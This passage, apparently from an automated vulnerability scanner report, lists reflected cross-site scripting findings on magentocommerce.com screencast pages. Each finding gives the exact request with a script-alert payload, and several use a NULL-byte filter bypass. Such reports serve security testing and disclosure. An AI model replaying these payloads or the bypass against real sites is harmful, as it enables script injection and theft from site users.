Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:07:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176075; expires=Sat, 11-Aug-2012 15:07:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A99%3A%22%2Fmedia%2Fscreencasts%2Fprivate-sales-including-events-invitations-and-category-access-permissions%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:55 GMT
Content-Length: 33641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/private-sales-including-events-invitations-and-category-access-permissions/view?%0091413"><script>alert(1)</script>c91b0ff721a=1">
...[SNIP]...

1.31. http://www.magentocommerce.com/media/screencasts/product-comparison/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a270"><script>alert(1)</script>52125fe349d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/product-comparison3a270"><script>alert(1)</script>52125fe349d/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176185; expires=Sat, 11-Aug-2012 15:09:45 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:45 GMT
Content-Length: 33501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/product-comparison3a270"><script>alert(1)</script>52125fe349d/view">
...[SNIP]...

1.32. http://www.magentocommerce.com/media/screencasts/product-comparison/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/product-comparison/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003a6ad"><script>alert(1)</script>eff1795c9ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a6ad"><script>alert(1)</script>eff1795c9ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/product-comparison/view?%003a6ad"><script>alert(1)</script>eff1795c9ed=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:08:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176132; expires=Sat, 11-Aug-2012 15:08:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A43%3A%22%2Fmedia%2Fscreencasts%2Fproduct-comparison%2Fview%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:08:52 GMT
Content-Length: 33317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/product-comparison/view?%003a6ad"><script>alert(1)</script>eff1795c9ed=1">
...[SNIP]...

1.33. http://www.magentocommerce.com/media/screencasts/search/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfdc4"><script>alert(1)</script>6969d62cb31 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/searchdfdc4"><script>alert(1)</script>6969d62cb31/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176249; expires=Sat, 11-Aug-2012 15:10:49 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:49 GMT
Content-Length: 33489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/searchdfdc4"><script>alert(1)</script>6969d62cb31/view">
...[SNIP]...

1.34. http://www.magentocommerce.com/media/screencasts/search/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/search/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066489"><script>alert(1)</script>107d780fdac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66489"><script>alert(1)</script>107d780fdac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/search/view?%0066489"><script>alert(1)</script>107d780fdac=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176207; expires=Sat, 11-Aug-2012 15:10:07 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Fscreencasts%2Fsearch%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:08 GMT
Content-Length: 33276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/search/view?%0066489"><script>alert(1)</script>107d780fdac=1">
...[SNIP]...

1.35. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b86"><script>alert(1)</script>e1f23b845dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/single-page-checkout-guest-checkout10b86"><script>alert(1)</script>e1f23b845dc/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176269; expires=Sat, 11-Aug-2012 15:11:09 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:09 GMT
Content-Length: 33518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout10b86"><script>alert(1)</script>e1f23b845dc/view">
...[SNIP]...

1.36. http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/single-page-checkout-guest-checkout/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f92a3"><script>alert(1)</script>944016f3b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f92a3"><script>alert(1)</script>944016f3b45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/single-page-checkout-guest-checkout/view?%00f92a3"><script>alert(1)</script>944016f3b45=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176250; expires=Sat, 11-Aug-2012 15:10:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fmedia%2Fscreencasts%2Fsingle-page-checkout-guest-checkout%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:50 GMT
Content-Length: 34222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/single-page-checkout-guest-checkout/view?%00f92a3"><script>alert(1)</script>944016f3b45=1">
...[SNIP]...

1.37. http://www.magentocommerce.com/media/screencasts/static-blocks/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6e4"><script>alert(1)</script>98b5a898c24 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/static-blocks3b6e4"><script>alert(1)</script>98b5a898c24/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176162; expires=Sat, 11-Aug-2012 15:09:22 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:22 GMT
Content-Length: 33496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/static-blocks3b6e4"><script>alert(1)</script>98b5a898c24/view">
...[SNIP]...

1.38. http://www.magentocommerce.com/media/screencasts/static-blocks/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/static-blocks/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00df3f4"><script>alert(1)</script>c995222f5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df3f4"><script>alert(1)</script>c995222f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/static-blocks/view?%00df3f4"><script>alert(1)</script>c995222f5e=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_homepage_intro=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_WRUID=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_frontend=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 15:07:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 01:16:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313176072; expires=Sat, 11-Aug-2012 15:07:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Fscreencasts%2Fstatic-blocks%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:52 GMT
Content-Length: 34345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/static-blocks/view?%00df3f4"><script>alert(1)</script>c995222f5e=1">
...[SNIP]...

1.39. http://www.magentocommerce.com/media/screencasts/transactional-email/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3ea"><script>alert(1)</script>34fe324f96d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/transactional-email4c3ea"><script>alert(1)</script>34fe324f96d/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176233; expires=Sat, 11-Aug-2012 15:10:33 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:34 GMT
Content-Length: 33502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/transactional-email4c3ea"><script>alert(1)</script>34fe324f96d/view">
...[SNIP]...

1.40. http://www.magentocommerce.com/media/screencasts/transactional-email/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/transactional-email/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00996a5"><script>alert(1)</script>f2333fb71e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 996a5"><script>alert(1)</script>f2333fb71e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/transactional-email/view?%00996a5"><script>alert(1)</script>f2333fb71e2=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176167; expires=Sat, 11-Aug-2012 15:09:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Ftransactional-email%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:27 GMT
Content-Length: 34475

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/transactional-email/view?%00996a5"><script>alert(1)</script>f2333fb71e2=1">
...[SNIP]...

1.41. http://www.magentocommerce.com/media/screencasts/upsells/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/upsells/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fea2e"><script>alert(1)</script>1e31a06b711 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/upsellsfea2e"><script>alert(1)</script>1e31a06b711/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
